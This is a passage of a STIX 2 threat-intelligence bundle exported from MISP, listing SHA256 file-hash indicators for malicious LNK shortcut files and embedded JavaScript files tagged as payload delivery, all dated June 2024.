'a77789f32058b879d7e3831d2d20a885996b8f07694a954e1e717f0483660ccb']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--59ac70c5-34e7-466f-a686-959e2bda5b8c", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = '984e8b3dda2c87bc8e3d21a05b07a8f52799c99aa45584aa2671efe62b5184c2']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--a7a54017-989f-4729-a7de-58f11c46f35a", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = '3f23d9ffc16c5f455f7bd02bf57667efb3d0a645ffa13fa38e0a6f5022208dd4']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--789e13a5-c534-4aa0-87ad-22c9d436c9b8", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = '4e18b57c586b3bfb6bd825ecbee2bdfcce91c8414e40c0a7655edc327d62ac0f']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--fe29b845-1b6c-4fd5-92cf-660c1908ef11", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = 'f4ffced2a4c7f3e48f2a43e17e58f8feb0ad6cb2ad98fafc87d9a159230810fa']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--f25385ef-e065-42dc-8a63-0517c352f28a", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = '9483bccb2b0964d11b13ca01fba7ba6a21a531807d48eb3182ceaf7ed240ef2b']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--3aa88adf-d56b-4ce9-9d48-3d4e9440bff7", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = '26f92ea9f5eb220d9e544af757c57e5672971b9cd43b166e65c055b6978d6031']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--68baf0be-5855-4540-ba40-065119dad0c0", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = '2c8116dce38993762cdb687eab69786b9ccd1bd8c569dee8bef5a226579224bb']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--6b296be4-3e6f-40fd-a449-7681141df090", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = '4bcf097c19e18e3b3bfa4c45ebb4e67d565a0984211edf9e2fdc042b43141317']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--977a76ea-ca17-43fe-a7ca-99b89a8d3982", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = '67b648a7f0d24e5b56e83f73f9494be6a63f4d7372c960a2134054352c9c3490']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--3ecffff1-414e-4bc9-94f2-56650b0cfaf5", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = '9ce558dc6af9c183d15012a5012a36184586e40f8a461a948192c3f055201766']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--bc044436-e162-43e9-bd85-d5505ec006e2", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = 'b5953319cb28a0db7a70dff03949f1d98487456a273ac3cfb1f70f8cb3b07c18']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--68574461-cd05-4934-8248-f4d40f36f1a6", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = 'e4b8fe0b0a87e5844deee4668d7638acd3ab9ea60a947eb1b32a4bd0691e5411']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--07b6cb8e-3e1c-469e-9709-602aaac1faf7", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = '7fffe1969dee2b4c72b4c5d0c75e493ecf6f3598a89d8538be3e7c53b898bbff']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--997b6c33-fa08-44aa-b395-d1de793a998e", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = '6cb99d0073d2e6b7e15b22a74b98901dccb3c328d88f6e1c38b0af0379dd388c']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--9a44f194-35dd-448f-93c2-487c57e749af", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = '5a3811aee5156d928b2b634b512d382d89f8203cb883cab743a54cbc4f3f41f1']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--7d175867-b502-4d40-ad5a-5a3788eea7fc", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = 'bfcfa5e291b0c9201344a73c8ef25c2912561e32c48af0ae0d30ad8199ffc8c4']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--ed9084b6-c33c-4dce-b107-4603fff35966", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = 'c4a912f776579aa0126bbadd9261a4cd6efb3bcb5f5c7d64e96b11f3bdbc214b']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--a8c429c2-ef1a-4f74-8d72-10bb5e7210b0", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = 'f92c275dfd051481cb03557213195647dd7c68edf9f7beddcff0aadf298f371b']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--89479bdf-bf86-49f5-a969-748f027dba61", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = '1b14de17a12cdb92210b8543e3418c16f9fe00db3394fa74ab3a8f1c5904ecf0']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--126aafdd-72f0-4504-89c7-b90116dfc292", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = 'c4e2301615cbab9abf2d94327bb7839df64d88fc5c508a2f33c3f0fc881be7c3']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--a7b2209d-aba8-416f-9ac0-e288db94a9ee", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = '066b3631682f63b4a44ecfa5b6dfb100d8052429a7e1c5b1ba8cab4832529f26']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--6523bb7c-2bd5-4574-947e-6816950dd159", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = 'fb76bc19e177372d210bcfe9b1f35fb296b0b7cb64f0ad5075a64d06a3c85159']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--959144ec-707c-44f3-a92d-452269b0659b", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = '2c4356614ddeb8085367167b301a8e437166142e738adb27bf26c09da3acae56']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--31cc7055-d867-4912-aa55-1d34d60562ba", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = '4b1b7257fd376286501043eb27debc850300a674962068e044a34e697381d694']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--88032f64-0a3a-468a-b20f-e67fd5972b62", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = '0618b63352d0ae02d0f02ce8adf02d1c16fd56b18e903622bc95e520388743e0']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--6ee2deb3-c786-4338-af18-3e88efe32b67", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = '792ca7508ce158e20eff7b838fafb6120afc81b3677a84eb066810544ccf1577']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--d5d14874-da5c-41e7-b34c-865cff787ce9", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = '49fa747eee1bebed9bbb74b7b555f8018fb4e0e11f74349c2f7ac89a225d27f8']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--942c6dab-ec03-4a4e-b67f-7670d140f344", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = '1b9604b50e8c0c6cf2496855a3c367d72fc447839fab708b20d649cf276f572a']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--92124619-f4a4-4944-a23a-1e03b6eea724", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = '698c73f004e7f46bc371e0476193456071d9f7df9662cca7aa0e010b4fcedf57']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--5cf81593-976c-432d-be3d-a81bbe050c96", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = '0986b26fcc87723d73e80c280f1bbc221fdb188ab8666f098caac6d896f1c4d1']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--7afd12ad-b68d-4719-b735-716351d822b8", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = '27ace9002f5bc7b3474ec3ec7ac72ed094fa2d29d9b2e8b5b1a787b50afd4f05']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--4ea64b7c-4b70-4d7d-9659-2ca422c9e406", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = 'e498efd08ced0eccaebc4721cee807858d40fde428fd5ea61ce06272a25282a0']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--a6f4314b-f37e-42fa-a6a6-a9b453052f91", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "LNK", "pattern": "[file:hashes.SHA256 = '26dfb13aea6f55e01f4dc54bb91ea7d9afd3bd73bd0c95b63345364ed149ff80']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--26606ab3-6101-44d4-9da1-b3d924fae337", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "Embedded JS", "pattern": "[file:hashes.SHA256 = 'aa58e1b322877ff660961e18558488c49491a523a12373f95c41a1dfe60ad477']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--aa71e0e1-5235-4c45-be95-c23d8e0e292f", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "Embedded JS", "pattern": "[file:hashes.SHA256 = '43c40fe84b53b2573564331db15f5fea8cdf599d6c9c2f361dd154a9b78cd6aa']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--5f47370a-c025-4e1d-946d-45184c0ee928", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "Embedded JS", "pattern": "[file:hashes.SHA256 = '3df795503a11b3c1a7ce3aeaf72f436ec9d7704c8189f9aa4abbc4f6db69d155']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--973c2dfb-4f4e-4c29-b699-cd32b838913a", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "Embedded JS", "pattern": "[file:hashes.SHA256 = 'f0f587aa4eac787e4caf5f4b8795b7cc8a4c33fbb518ec2d616516076570f393']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--5ac26f12-ebf6-4a79-9b3a-461a61fd0336", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "Embedded JS", "pattern": "[file:hashes.SHA256 = 'bae38315e5a6622d01b66db561efa206e698f3cb6157645dabd4f0267b8d2c91']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--a8b9e47f-9f86-466a-a680-3f7b7d9b54ec", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "Embedded JS", "pattern": "[file:hashes.SHA256 = '5779a2234b05311716259837998997847d56cdcd421cacf0a1860bbe4ba70b79']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--616aa340-4ff5-4e9f-9d2a-402b2c0d208b", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "Embedded JS", "pattern": "[file:hashes.SHA256 = '35a9c2e8d911c8793a4b464633beaa2c6772601d6d58bf12c456e694a4adcf46']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--5b9787cf-0a5d-47f4-933e-4b9cf044e232", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "Embedded JS", "pattern": "[file:hashes.SHA256 = '220dd9d5ba1c6e087c8294eb01b7e0dfeb39b3a9c99567da102df44b2f04dbd7']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--1ca57c2b-8e4a-42ed-bafa-a106cbbc363d", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "Embedded JS", "pattern": "[file:hashes.SHA256 = 'dd4fc4760401b8dc37b0a823af19d0f7b5c2039704caf5327f8f8c6d00bd148c']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--21caa1eb-3474-417d-b840-ee0290dc3383", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "Embedded JS", "pattern": "[file:hashes.SHA256 = 'd18cf366f549a8828dc02e6540a191b3625da36995806dab559d6b020fe74695']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--a3e537e4-aa48-42e0-bcce-389268fc9af0", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "Embedded JS", "pattern": "[file:hashes.SHA256 = 'db6a8b9988ab1b83d8c1e6b5bd0a4bbf2baacf1ed84220026f9ae8a867e5eec2']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--c889a5a6-fbdb-4441-8e6e-d8c66199a6fb", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "Embedded JS", "pattern": "[file:hashes.SHA256 = 'e121a6c8cccecbe1a27c2003c255096f04c23f13b24a1f035775348f2aae53d0']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--d59829f8-181f-4c85-9513-0320e8e21465", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "Embedded JS", "pattern": "[file:hashes.SHA256 = 'daed820a32723e146e762343d0a32f041d21bd2e603b355b2f91d0bc7d98927c']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--8f09eac1-5551-4cac-afa0-01a41231978c", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "Embedded JS", "pattern": "[file:hashes.SHA256 = '41bb112c6d4c609d53111ad1bb7cc687ec8ab848b6039c7a8eb64fee311b0822']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--0da12927-e943-4516-adae-5cb9ebfe973d", "created_by_ref": 